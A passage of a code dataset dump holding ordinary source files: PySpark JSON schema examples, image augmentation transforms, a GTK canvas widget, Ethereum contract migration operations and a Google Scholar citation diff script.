T.StringType()),\n ]\n) # <2>\n\nepisode_schema = T.StructType(\n [\n T.StructField(\"_links\", episode_links_schema), # <3>\n T.StructField(\"airdate\", T.DateType()),\n T.StructField(\"airstamp\", T.TimestampType()),\n T.StructField(\"airtime\", T.StringType()),\n T.StructField(\"id\", T.StringType()),\n T.StructField(\"image\", episode_image_schema), # <3>\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"number\", T.LongType()),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\"season\", T.LongType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"url\", T.StringType()),\n ]\n)\n\nembedded_schema = T.StructType(\n [T.StructField(\"episodes\", T.ArrayType(episode_schema))] # <4>\n)\n\n# end::ch06-first-part-schema[]\n\n# tag::ch06-full-schema[]\n\nepisode_links_schema = T.StructType(\n [T.StructField(\"self\", T.StructType([T.StructField(\"href\", T.StringType())]))]\n)\n\nepisode_image_schema = T.StructType(\n [\n T.StructField(\"medium\", T.StringType()),\n T.StructField(\"original\", T.StringType()),\n ]\n)\n\nepisode_schema = T.StructType(\n [\n T.StructField(\"_links\", episode_links_schema),\n T.StructField(\"airdate\", T.DateType()),\n T.StructField(\"airstamp\", T.TimestampType()),\n T.StructField(\"airtime\", T.StringType()),\n T.StructField(\"id\", T.StringType()),\n T.StructField(\"image\", episode_image_schema),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"number\", T.LongType()),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\"season\", T.LongType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"url\", T.StringType()),\n ]\n)\n\nembedded_schema = T.StructType([T.StructField(\"episodes\", T.ArrayType(episode_schema))])\n\nnetwork_schema = T.StructType(\n [\n T.StructField(\n \"country\",\n T.StructType(\n [\n 
T.StructField(\"code\", T.StringType()),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"timezone\", T.StringType()),\n ]\n ),\n ),\n T.StructField(\"id\", T.LongType()),\n T.StructField(\"name\", T.StringType()),\n ]\n)\n\nshows_schema = T.StructType(\n [\n T.StructField(\"_embedded\", embedded_schema),\n T.StructField(\"language\", T.StringType()),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"network\", network_schema),\n T.StructField(\"officialSite\", T.StringType()),\n T.StructField(\"premiered\", T.StringType()),\n T.StructField(\n \"rating\", T.StructType([T.StructField(\"average\", T.DoubleType())])\n ),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\n \"schedule\",\n T.StructType(\n [\n T.StructField(\"days\", T.ArrayType(T.StringType())),\n T.StructField(\"time\", T.StringType()),\n ]\n ),\n ),\n T.StructField(\"status\", T.StringType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"type\", T.StringType()),\n T.StructField(\"updated\", T.LongType()),\n T.StructField(\"url\", T.StringType()),\n T.StructField(\"webChannel\", T.StringType()),\n T.StructField(\"weight\", T.LongType()),\n ]\n)\n# end::ch06-full-schema[]\n\n# tag::ch06-reread[]\n\nshows_with_schema = spark.read.json(\n \"../../data/Ch06/shows-silicon-valley.json\",\n schema=shows_schema, # <1>\n mode=\"FAILFAST\", # <2>\n)\n\n# end::ch06-reread[]\n\n# tag::ch06-schema-validation[]\nfor column in [\"airdate\", \"airstamp\"]:\n shows.select(f\"_embedded.episodes.{column}\").select(F.explode(column)).show(5)\n\n# +----------+\n# | col|\n# +----------+\n# |2014-04-06|\n# |2014-04-13|\n# |2014-04-20|\n# |2014-04-27|\n# |2014-05-04|\n# +----------+\n# only showing top 5 rows\n\n# +-------------------+\n# | col|\n# +-------------------+\n# |2014-04-06 22:00:00|\n# |2014-04-13 22:00:00|\n# |2014-04-20 22:00:00|\n# |2014-04-27 22:00:00|\n# |2014-05-04 22:00:00|\n# +-------------------+\n# only showing top 5 rows\n\n# end::ch06-schema-validation[]\n\n# tag::ch06-wrong-schema[]\nfrom py4j.protocol import Py4JJavaError # <1>\n\nshows_schema2 = T.StructType(\n [\n T.StructField(\"_embedded\", embedded_schema),\n T.StructField(\"language\", T.StringType()),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"network\", network_schema),\n T.StructField(\"officialSite\", T.StringType()),\n T.StructField(\"premiered\", T.StringType()),\n T.StructField(\n \"rating\", T.StructType([T.StructField(\"average\", T.DoubleType())])\n ),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\n \"schedule\",\n T.StructType(\n [\n T.StructField(\"days\", T.ArrayType(T.StringType())),\n T.StructField(\"time\", T.StringType()),\n ]\n ),\n ),\n T.StructField(\"status\", T.StringType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"type\", T.LongType()), # <2>\n T.StructField(\"updated\", T.LongType()),\n T.StructField(\"url\", T.LongType()), # <2>\n T.StructField(\"webChannel\", T.StringType()),\n T.StructField(\"weight\", T.LongType()),\n ]\n)\n\nshows_with_schema_wrong = spark.read.json(\n \"../../data/Ch06/shows-silicon-valley.json\", schema=shows_schema2, mode=\"FAILFAST\",\n)\n\ntry:\n shows_with_schema_wrong.show()\nexcept Py4JJavaError:\n pass\n\n# Huge Spark ERROR stacktrace, relevant bit:\n#\n# Caused by: java.lang.RuntimeException: Failed to parse a value for data type\n# bigint (current token: VALUE_STRING). 
<3>\n\n# end::ch06-wrong-schema[]\n\n# tag::ch06-json-schema[]\n\nimport pprint # <1>\n\npprint.pprint(shows_with_schema.select(\"schedule\").schema.jsonValue())\n# {'fields': [{'metadata': {},\n# 'name': 'schedule',\n# 'nullable': True,\n# 'type': {'fields': [{'metadata': {},\n# 'name': 'days',\n# 'nullable': True,\n# 'type': {'containsNull': True,\n# 'elementType': 'string',\n# 'type': 'array'}},\n# {'metadata': {},\n# 'name': 'time',\n# 'nullable': True,\n# 'type': 'string'}],\n# 'type': 'struct'}}],\n# 'type': 'struct'}\n# end::ch06-json-schema[]\n\n# tag::ch06-complex-json[]\n\npprint.pprint(T.StructField(\"array_example\", T.ArrayType(T.StringType())).jsonValue())\n\n# {'metadata': {},\n# 'name': 'array_example',\n# 'nullable': True,\n# 'type': {'containsNull': True, 'elementType': 'string', 'type': 'array'}} # <1>\n\npprint.pprint(\n T.StructField(\"map_example\", T.MapType(T.StringType(), T.LongType())).jsonValue()\n)\n\n# {'metadata': {},\n# 'name': 'map_example',\n# 'nullable': True,\n# 'type': {'keyType': 'string',\n# 'type': 'map',\n# 'valueContainsNull': True,\n# 'valueType': 'long'}} <2>\n\npprint.pprint(\n T.StructType(\n [\n T.StructField(\"map_example\", T.MapType(T.StringType(), T.LongType())),\n T.StructField(\"array_example\", T.ArrayType(T.StringType())),\n ]\n ).jsonValue()\n)\n\n# {'fields': [{'metadata': {}, <3>\n# 'name': 'map_example',\n# 'nullable': True,\n# 'type': {'keyType': 'string',\n# 'type': 'map',\n# 'valueContainsNull': True,\n# 'valueType': 'long'}},\n# {'metadata': {},\n# 'name': 'array_example',\n# 'nullable': True,\n# 'type': {'containsNull': True,\n# 'elementType': 'string',\n# 'type': 'array'}}],\n# 'type': 'struct'}\n\n# end::ch06-complex-json[]\n\n# tag::ch06-json-schema-comparison[]\n\nother_shows_schema = T.StructType.fromJson(json.loads(shows_with_schema.schema.json()))\n\nprint(other_shows_schema == shows_with_schema.schema) # True\n# end::ch06-json-schema-comparison[]\n\n# tag::ch06-explode[]\nepisodes = shows.select(\"id\", F.explode(\"_embedded.episodes\").alias(\"episodes\")) # <1>\nepisodes.show(5)\n# +---+--------------------+\n# | id| episodes|\n# +---+--------------------+\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# +---+--------------------+\n# only showing top 5 rows\n\nepisodes.count() # 53\n\n# end::ch06-explode[]\n\n# tag::ch06-explode-map[]\nepisode_name_id = shows.select(\n F.map_from_arrays( # <1>\n F.col(\"_embedded.episodes.id\"), F.col(\"_embedded.episodes.name\")\n ).alias(\"name_id\")\n)\n\nepisode_name_id = episode_name_id.select(\n F.posexplode(\"name_id\").alias(\"position\", \"id\", \"name\") # <2>\n)\n\nepisode_name_id.show(5)\n\n# +--------+-----+--------------------+\n# |position| id| name|\n# +--------+-----+--------------------+\n# | 0|10897|Minimum Viable Pr...|\n# | 1|10898| The Cap Table|\n# | 2|10899|Articles of Incor...|\n# | 3|10900| Fiduciary Duties|\n# | 4|10901| Signaling Risk|\n# +--------+-----+--------------------+\n# only showing top 5 rows\n\n# end::ch06-explode-map[]\n\n# tag::ch06-collect[]\ncollected = episodes.groupby(\"id\").agg(F.collect_list(\"episodes\").alias(\"episodes\"))\n\ncollected.count() # 1\n\ncollected.printSchema()\n# |-- id: long (nullable = true)\n# |-- episodes: array (nullable = true)\n# | |-- element: struct (containsNull = false)\n# | | |-- _links: struct (nullable = true)\n# | | | |-- self: struct (nullable = true)\n# | | | | |-- href: string (nullable = true)\n# | | 
|-- airdate: string (nullable = true)\n# | | |-- airstamp: timestamp (nullable = true)\n# | | |-- airtime: string (nullable = true)\n# | | |-- id: long (nullable = true)\n# | | |-- image: struct (nullable = true)\n# | | | |-- medium: string (nullable = true)\n# | | | |-- original: string (nullable = true)\n# | | |-- name: string (nullable = true)\n# | | |-- number: long (nullable = true)\n# | | |-- runtime: long (nullable = true)\n# | | |-- season: long (nullable = true)\n# | | |-- summary: string (nullable = true)\n# | | |-- url: string (nullable = true)\n# end::ch06-collect[]\n\n# tag::ch06-struct-in-struct[]\nstruct_ex = shows.select(\n F.struct( # <1>\n F.col(\"status\"), F.col(\"weight\"), F.lit(True).alias(\"has_watched\")\n ).alias(\"info\")\n)\n\nstruct_ex.show(1, False)\n# +-----------------+\n# |info |\n# +-----------------+\n# |[Ended, 96, true]| <2>\n# +-----------------+\n\nstruct_ex.printSchema()\n# root\n# |-- info: struct (nullable = false) <2>\n# | |-- status: string (nullable = true)\n# | |-- weight: long (nullable = true)\n# | |-- has_watched: boolean (nullable = false)\n# end::ch06-struct-in-struct[]\n","sub_path":"code/Ch06/book_code.py","file_name":"book_code.py","file_ext":"py","file_size_in_byte":23389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"447150300","text":"import cv2\nimport numpy as np\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\n\nclass Denormalize(object):\n \"\"\"\n Denormalize image and boxes for visualization\n \"\"\"\n def __init__(self, mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225], **kwargs):\n self.mean = mean\n self.std = std\n \n def __call__(self, img, box = None, label = None, mask = None, **kwargs):\n \"\"\"\n :param img: (tensor) image to be denormalized\n :param box: (list of tensor) bounding boxes to be denormalized, by multiplying them with image's width and heights. 
Format: (x,y,width,height)\n \"\"\"\n mean = np.array(self.mean)\n std = np.array(self.std)\n img_show = img.numpy().squeeze().transpose((1,2,0))\n img_show = (img_show * std+mean)\n img_show = np.clip(img_show,0,1)\n return img_show\n\ndef get_resize_augmentation(image_size, keep_ratio=False, box_transforms = False):\n\n bbox_params = A.BboxParams(\n format='pascal_voc', \n min_area=0, \n min_visibility=0,\n label_fields=['class_labels']) if box_transforms else None\n\n if not keep_ratio:\n return A.Compose([\n A.Resize(\n height = image_size[1],\n width = image_size[0]\n )], \n bbox_params= bbox_params) \n else:\n return A.Compose([\n A.LongestMaxSize(max_size=max(image_size)), \n A.PadIfNeeded(min_height=image_size[1], min_width=image_size[0], p=1.0, border_mode=cv2.BORDER_CONSTANT),\n ], \n bbox_params=bbox_params)\n \n\ndef get_augmentation(config, _type='train'):\n train_transforms = A.Compose([\n A.OneOf([\n A.MotionBlur(p=.2),\n A.GaussianBlur(),\n A.MedianBlur(blur_limit=3, p=0.3),\n A.Blur(blur_limit=3, p=0.1),\n ], p=0.3),\n A.ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.2, rotate_limit=20, p=0.3),\n A.CLAHE(clip_limit=2.0, tile_grid_size=(8,8), p=0.5),\n A.OneOf([\n A.HueSaturationValue(hue_shift_limit=0.2, sat_shift_limit= 0.2, \n val_shift_limit=0.2, p=0.9),\n A.RandomBrightnessContrast(brightness_limit=0.1, \n contrast_limit=0.1, \n p=0.3), \n ], p=0.5),\n\n \n A.HorizontalFlip(p=0.3),\n A.VerticalFlip(p=0.3),\n A.RandomRotate90(p=0.3),\n A.Cutout(num_holes=8, max_h_size=64, max_w_size=64, fill_value=0, p=0.5),\n A.Normalize(mean=(0, 0, 0), std=(1, 1, 1), max_pixel_value=255.0, p=1.0),\n ToTensorV2(p=1.0)\n ], bbox_params=A.BboxParams(\n format='pascal_voc',\n min_area=0, \n min_visibility=0, \n label_fields=['class_labels']))\n\n\n val_transforms = A.Compose([\n A.Normalize(mean=(0, 0, 0), std=(1, 1, 1), max_pixel_value=255.0, p=1.0),\n ToTensorV2(p=1.0)\n ], bbox_params=A.BboxParams(\n format='pascal_voc', \n min_area=0, \n min_visibility=0,\n label_fields=['class_labels']))\n \n\n return train_transforms if _type == 'train' else val_transforms","sub_path":"augmentations/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"488910597","text":"from ..colors import native_color\nfrom ..libs import Gdk, Gtk, Pango, cairo\nfrom .base import Widget\n\n\nclass Canvas(Widget):\n def create(self):\n if cairo is None:\n raise RuntimeError(\n \"'import cairo' failed; may need to install python-gi-cairo.\"\n )\n\n self.native = Gtk.DrawingArea()\n\n self.native.connect(\"draw\", self.gtk_draw_callback)\n self.native.connect(\"size-allocate\", self.gtk_on_size_allocate)\n self.native.connect(\"button-press-event\", self.mouse_down)\n self.native.connect(\"button-release-event\", self.mouse_up)\n self.native.connect(\"motion-notify-event\", self.mouse_move)\n self.native.set_events(\n Gdk.EventMask.BUTTON_PRESS_MASK\n | Gdk.EventMask.BUTTON_RELEASE_MASK\n | Gdk.EventMask.BUTTON_MOTION_MASK\n )\n # count number of active clicks\n self.clicks = 0\n\n def gtk_draw_callback(self, canvas, gtk_context):\n \"\"\"Creates a draw callback.\n\n Gtk+ uses a drawing callback to draw on a DrawingArea. Assignment of the\n callback function creates a Gtk+ canvas and Gtk+ context automatically using the\n canvas and gtk_context function arguments. 
This method calls the draw method on\n the interface Canvas to draw the objects.\n \"\"\"\n self.original_transform_matrix = gtk_context.get_matrix()\n self.interface._draw(self, draw_context=gtk_context)\n\n def gtk_on_size_allocate(self, widget, allocation):\n \"\"\"Called on widget resize, and calls the handler set on the interface, if\n any.\"\"\"\n if self.interface.on_resize:\n self.interface.on_resize(self.interface)\n\n def set_on_resize(self, handler):\n pass\n\n def set_on_press(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_release(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_drag(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_alt_press(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_alt_release(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_alt_drag(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def mouse_down(self, obj, event):\n self.clicks = 2 if event.type == Gdk.EventType._2BUTTON_PRESS else 1\n if event.button == 1 and self.interface.on_press:\n self.interface.on_press(self.interface, event.x, event.y, self.clicks)\n if event.button == 3 and self.interface.on_alt_press:\n self.interface.on_alt_press(self.interface, event.x, event.y, self.clicks)\n\n def mouse_move(self, obj, event):\n if self.clicks == 0:\n return\n if event.state == Gdk.ModifierType.BUTTON1_MASK and self.interface.on_drag:\n self.interface.on_drag(self.interface, event.x, event.y, self.clicks)\n if event.state == Gdk.ModifierType.BUTTON3_MASK and self.interface.on_alt_drag:\n self.interface.on_alt_drag(self.interface, event.x, event.y, self.clicks)\n\n def mouse_up(self, obj, event):\n if event.button == 1 and self.interface.on_release:\n self.interface.on_release(self.interface, event.x, event.y, self.clicks)\n if event.button == 3 and self.interface.on_alt_release:\n self.interface.on_alt_release(self.interface, event.x, event.y, self.clicks)\n self.clicks = 0\n\n def redraw(self):\n self.native.queue_draw()\n\n # Basic paths\n\n def new_path(self, draw_context, *args, **kwargs):\n draw_context.new_path()\n\n def closed_path(self, x, y, draw_context, *args, **kwargs):\n draw_context.close_path()\n\n def move_to(self, x, y, draw_context, *args, **kwargs):\n draw_context.move_to(x, y)\n\n def line_to(self, x, y, draw_context, *args, **kwargs):\n draw_context.line_to(x, y)\n\n # Basic shapes\n\n def bezier_curve_to(\n self, cp1x, cp1y, cp2x, cp2y, x, y, draw_context, *args, **kwargs\n ):\n draw_context.curve_to(cp1x, cp1y, cp2x, cp2y, x, y)\n\n def quadratic_curve_to(self, cpx, cpy, x, y, draw_context, *args, **kwargs):\n draw_context.curve_to(cpx, cpy, cpx, cpy, x, y)\n\n def arc(\n self,\n x,\n y,\n radius,\n startangle,\n endangle,\n anticlockwise,\n draw_context,\n *args,\n **kwargs\n ):\n if anticlockwise:\n draw_context.arc_negative(x, y, radius, startangle, endangle)\n else:\n draw_context.arc(x, y, radius, startangle, endangle)\n\n def ellipse(\n self,\n x,\n y,\n radiusx,\n radiusy,\n rotation,\n startangle,\n endangle,\n anticlockwise,\n draw_context,\n *args,\n **kwargs\n ):\n draw_context.save()\n draw_context.translate(x, y)\n if radiusx >= radiusy:\n draw_context.scale(1, radiusy / radiusx)\n self.arc(0, 0, radiusx, startangle, endangle, anticlockwise, draw_context)\n else:\n draw_context.scale(radiusx / radiusy, 1)\n self.arc(0, 0, radiusy, startangle, endangle, anticlockwise, draw_context)\n 
draw_context.rotate(rotation)\n draw_context.identity_matrix()\n draw_context.restore()\n\n def rect(self, x, y, width, height, draw_context, *args, **kwargs):\n draw_context.rectangle(x, y, width, height)\n\n # Drawing Paths\n\n def apply_color(self, color, draw_context, *args, **kwargs):\n if color is not None:\n draw_context.set_source_rgba(*native_color(color))\n else:\n # set color to black\n draw_context.set_source_rgba(0, 0, 0, 1.0)\n\n def fill(self, color, fill_rule, preserve, draw_context, *args, **kwargs):\n self.apply_color(color, draw_context)\n if fill_rule == \"evenodd\":\n draw_context.set_fill_rule(cairo.FILL_RULE_EVEN_ODD)\n else:\n draw_context.set_fill_rule(cairo.FILL_RULE_WINDING)\n if preserve:\n draw_context.fill_preserve()\n else:\n draw_context.fill()\n\n def stroke(self, color, line_width, line_dash, draw_context, *args, **kwargs):\n self.apply_color(color, draw_context)\n draw_context.set_line_width(line_width)\n if line_dash is not None:\n draw_context.set_dash(line_dash)\n draw_context.stroke()\n draw_context.set_dash([])\n\n # Transformations\n\n def rotate(self, radians, draw_context, *args, **kwargs):\n draw_context.rotate(radians)\n\n def scale(self, sx, sy, draw_context, *args, **kwargs):\n draw_context.scale(sx, sy)\n\n def translate(self, tx, ty, draw_context, *args, **kwargs):\n draw_context.translate(tx, ty)\n\n def reset_transform(self, draw_context, *args, **kwargs):\n draw_context.set_matrix(self.original_transform_matrix)\n\n # Text\n\n def write_text(self, text, x, y, font, draw_context, *args, **kwargs):\n # Set font family and size\n if font:\n write_font = font\n elif self.native.font:\n write_font = self.native.font\n write_font.family = self.native.font.get_family()\n write_font.size = self.native.font.get_size() / Pango.SCALE\n draw_context.select_font_face(write_font.family)\n draw_context.set_font_size(write_font.size)\n\n # Support writing multiline text\n for line in text.splitlines():\n width, height = self.measure_text(line, write_font)\n draw_context.move_to(x, y)\n draw_context.text_path(line)\n y += height\n\n def measure_text(self, text, font, tight=False):\n layout = self.native.create_pango_layout(text)\n\n layout.set_font_description(self.native)\n ink, logical = layout.get_extents()\n if tight:\n width = (ink.width / Pango.SCALE) - (ink.width * 0.2) / Pango.SCALE\n height = ink.height / Pango.SCALE\n else:\n width = (logical.width / Pango.SCALE) - (logical.width * 0.2) / Pango.SCALE\n height = logical.height / Pango.SCALE\n\n return width, height\n\n def get_image_data(self):\n self.interface.factory.not_implemented(\"Canvas.get_image_data()\")\n\n # Rehint\n\n def rehint(self):\n # print(\"REHINT\", self, self.native.get_preferred_width(), self.native.get_preferred_height())\n # width = self.native.get_preferred_width()\n # height = self.native.get_preferred_height()\n pass\n","sub_path":"gtk/src/toga_gtk/widgets/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"165666632","text":"import functools\n\nfrom solc import compile_source\n\nfrom web3.utils.string import (\n force_text,\n)\n\nfrom populus.utils.transactions import (\n wait_for_transaction_receipt,\n get_contract_address_from_txn,\n)\nfrom populus.utils.contracts import (\n get_contract_link_dependencies,\n link_contract,\n)\n\nfrom .registrar import (\n REGISTRAR_SOURCE,\n)\nfrom .deferred import (\n Address,\n 
resolve_if_deferred_value,\n)\n\n\nclass Operation(object):\n \"\"\"\n Base class that all migration operations inherit from.\n \"\"\"\n def execute(self, **kwargs):\n raise NotImplementedError(\n \"The `execute` method must be implemented by each Operation subclass\"\n )\n\n\nclass RunPython(Operation):\n \"\"\"\n A migration operation that runs custom python code for executing operations\n that don't fit within the provided operation canvas.\n \"\"\"\n def __init__(self, callback):\n self.callback = callback\n\n def execute(self, **kwargs):\n return self.callback(**kwargs)\n\n\nclass SendTransaction(Operation):\n \"\"\"\n A migration operation that sends a transaction.\n \"\"\"\n transaction = None\n timeout = 30\n\n def __init__(self, transaction, timeout=120):\n self.transaction = transaction\n if timeout is not None:\n self.timeout = timeout\n\n def execute(self, chain, **kwargs):\n transaction_hash = chain.web3.eth.sendTransaction(self.transaction)\n if self.timeout is not None:\n wait_for_transaction_receipt(\n chain.web3, transaction_hash, timeout=self.timeout,\n )\n return {\n 'transaction-hash': transaction_hash,\n }\n\n\nclass DeployContract(Operation):\n contract = None\n transaction = None\n timeout = None\n libraries = None\n verify = None\n\n def __init__(self,\n contract_name,\n transaction=None,\n arguments=None,\n verify=True,\n libraries=None,\n timeout=120):\n if libraries is None:\n libraries = {}\n\n self.contract_name = contract_name\n self.libraries = libraries\n\n if timeout is None and verify:\n raise ValueError(\n \"Invalid configuration. When verifying a contracts deployment, \"\n \"the timeout value must be set.\"\n )\n\n if transaction is None:\n transaction = {}\n\n if 'data' in transaction or 'to' in transaction:\n raise ValueError(\n \"Invalid configuration. 
You cannot specify `data` or `to` \"\n \"values in `DeployContract` transactions.\"\n )\n\n if arguments is None:\n arguments = []\n\n self.transaction = transaction\n self.arguments = arguments\n self.verify = verify\n\n if timeout is not None:\n self.timeout = timeout\n\n def execute(self, chain, compiled_contracts, **kwargs):\n contract_data = compiled_contracts[self.contract_name]\n\n all_known_contract_names = set(self.libraries.keys()).union(\n set(compiled_contracts.keys())\n )\n link_dependencies = get_contract_link_dependencies(\n contract_data['code'],\n all_known_contract_names,\n )\n\n if link_dependencies:\n # TODO: try to look these values up with the registrar.\n missing_libraries = set(self.libraries.keys()).difference(link_dependencies)\n if missing_libraries:\n raise ValueError(\n \"Missing necessary libraries for linking: {0!r}\".format(missing_libraries)\n )\n resolve_fn = functools.partial(\n resolve_if_deferred_value,\n chain=chain,\n )\n resolved_dependencies = {\n dependency_name: resolve_fn(value)\n for dependency_name, value\n in self.libraries.items()\n }\n code = link_contract(contract_data['code'], **resolved_dependencies)\n runtime = link_contract(contract_data['code_runtime'], **resolved_dependencies)\n else:\n code = contract_data.get('code')\n runtime = contract_data.get('code_runtime')\n\n ContractFactory = chain.web3.eth.contract(\n abi=contract_data['abi'],\n code=code,\n code_runtime=runtime,\n source=contract_data.get('source'),\n )\n\n deploy_transaction_hash = ContractFactory.deploy(\n self.transaction,\n self.arguments,\n )\n\n if self.timeout is not None:\n contract_address = get_contract_address_from_txn(\n chain.web3, deploy_transaction_hash, timeout=self.timeout,\n )\n if self.verify:\n code = chain.web3.eth.getCode(contract_address)\n if force_text(code) != force_text(ContractFactory.code_runtime):\n raise ValueError(\n \"An error occured during deployment of the contract.\"\n )\n return {\n 'contract-address': contract_address,\n 'deploy-transaction-hash': deploy_transaction_hash,\n 'canonical-contract-address': Address.defer(\n key='/'.join(('contract', self.contract_name)),\n value=contract_address,\n ),\n }\n\n return {\n 'deploy-transaction-hash': deploy_transaction_hash,\n }\n\n\nclass TransactContract(Operation):\n contract_name = None\n method_name = None\n arguments = None\n transaction = None\n\n timeout = None\n\n def __init__(self,\n contract_name,\n method_name,\n arguments=None,\n transaction=None,\n contract_address=None, # TODO: this should come from the resolver.\n timeout=120):\n self.contract_address = contract_address\n self.contract_name = contract_name\n self.method_name = method_name\n\n if arguments is None:\n arguments = []\n self.arguments = arguments\n\n if transaction is None:\n transaction = {}\n\n self.transaction = transaction\n\n if timeout is not None:\n self.timeout = timeout\n\n def execute(self, chain, compiled_contracts, **kwargs):\n contract_name = resolve_if_deferred_value(self.contract_name, chain=chain)\n contract_address = resolve_if_deferred_value(self.contract_address, chain=chain)\n\n contract_data = compiled_contracts[contract_name]\n contract = chain.web3.eth.contract(\n address=contract_address,\n abi=contract_data['abi'],\n code=contract_data['code'],\n code_runtime=contract_data['code_runtime'],\n source=contract_data['source'],\n )\n\n arguments = [resolve_if_deferred_value(arg, chain=chain) for arg in self.arguments]\n method_name = resolve_if_deferred_value(self.method_name, chain=chain)\n\n 
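        # contract.transact() binds the base transaction parameters once; the\n        # resolved method name is then looked up on that transactor and called,\n        # and web3 hands back the transaction hash immediately.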
transactor = contract.transact(self.transaction)\n method = getattr(transactor, method_name)\n transaction_hash = method(*arguments)\n\n if self.timeout is not None:\n wait_for_transaction_receipt(\n chain.web3, transaction_hash, timeout=self.timeout,\n )\n\n return {\n 'transaction-hash': transaction_hash,\n }\n\n\nclass DeployRegistrar(DeployContract):\n def __init__(self, **kwargs):\n super(DeployRegistrar, self).__init__(\n contract_name=\"Registrar\",\n **kwargs\n )\n\n def execute(self, chain, **kwargs):\n kwargs.pop('compiled_contracts', None)\n compiled_contracts = compile_source(REGISTRAR_SOURCE)\n return super(DeployRegistrar, self).execute(\n chain=chain,\n compiled_contracts=compiled_contracts,\n **kwargs\n )\n","sub_path":"populus/migrations/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":7986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"273475058","text":"import scholarly\nimport pandas as pd\nimport sys\nfrom datetime import datetime\n\nif len(sys.argv) != 3:\n\tprint(\"Usage: diff.py old.csv new.csv\")\n\texit()\n\nfile1 = str(sys.argv[1])\nfile2 = str(sys.argv[2])\n\ncolumns = ['new_cites', 'cites', 'title', 'author', 'year', 'cites_per_year', 'eprint', \n'pages', 'publisher', 'url', 'id_citations', 'id_scholarcitedby', 'source', 'citedByUrl']\n\n\nupdate = pd.DataFrame(columns=columns)\n\ndf1 = pd.read_csv(file1) \ndf2 = pd.read_csv(file2) \n\nfor i in range(df1.shape[0]):\n\tpaper_id = df1.loc[i]['id_citations']\n\tpaper_scholar = df1.loc[i]['id_scholarcitedby']\n\tcites1 = df1.loc[i]['cites']\n\t#print(\"Search \" + paper_id + \" \" + df1.loc[i]['title'][0:20] + \" with \" + str(cites1) + \" cites\")\n\tcites2 = next(iter(df2.loc[df2['id_citations'] == paper_id]['cites']),'no match')\n\tif(cites2 == 'no match'):\n\t\tprint(\"Paper disappeared: \" + df1.loc[i]['title'][0:20])\n\t\tupdate = update.append(pd.Series([0, df1.loc[i]['cites'], df1.loc[i]['title'], df1.loc[i]['author'], df1.loc[i]['year'], df1.loc[i]['cites_per_year'], df1.loc[i]['eprint'], df1.loc[i]['pages'], df1.loc[i]['publisher'], df1.loc[i]['url'], df1.loc[i]['id_citations'], df1.loc[i]['id_scholarcitedby'], df1.loc[i]['source'], df1.loc[i]['citedByUrl']], index=update.columns), ignore_index=True)\n\telif(cites1 != cites2):\n\t\tprint(\"Paper \" + str(paper_scholar) + \" \" + df1.loc[i]['title'][0:20] + \" has gone from \" + \n\t\t\tstr(cites1) + \" to \" + str(cites2) + \" cites\")\n\t\tupdate = update.append(pd.Series([cites2, df1.loc[i]['cites'], df1.loc[i]['title'], df1.loc[i]['author'], df1.loc[i]['year'], df1.loc[i]['cites_per_year'], df1.loc[i]['eprint'], df1.loc[i]['pages'], df1.loc[i]['publisher'], df1.loc[i]['url'], df1.loc[i]['id_citations'], df1.loc[i]['id_scholarcitedby'], df1.loc[i]['source'], df1.loc[i]['citedByUrl']], index=update.columns), ignore_index=True)\n\nfor i in range(df2.shape[0]):\n\tpaper_id = df2.loc[i]['id_citations']\n\tpaper_scholar = df2.loc[i]['id_scholarcitedby']\n\tcites2 = df2.loc[i]['cites']\n\t#print(\"Search \" + paper_id + \" \" + df1.loc[i]['title'][0:20] + \" with \" + str(cites1) + \" cites\")\n\tcites1 = next(iter(df1.loc[df1['id_citations'] == paper_id]['cites']),'no match')\n\tif(cites1 == 'no match'):\n\t\tprint(\"New paper!\" + df2.loc[i]['title'][0:20])\n\t\tupdate = update.append(pd.Series([df2.loc[i]['cites'], 0, df2.loc[i]['title'], df2.loc[i]['author'], df2.loc[i]['year'], df2.loc[i]['cites_per_year'], df2.loc[i]['eprint'], df2.loc[i]['pages'], 
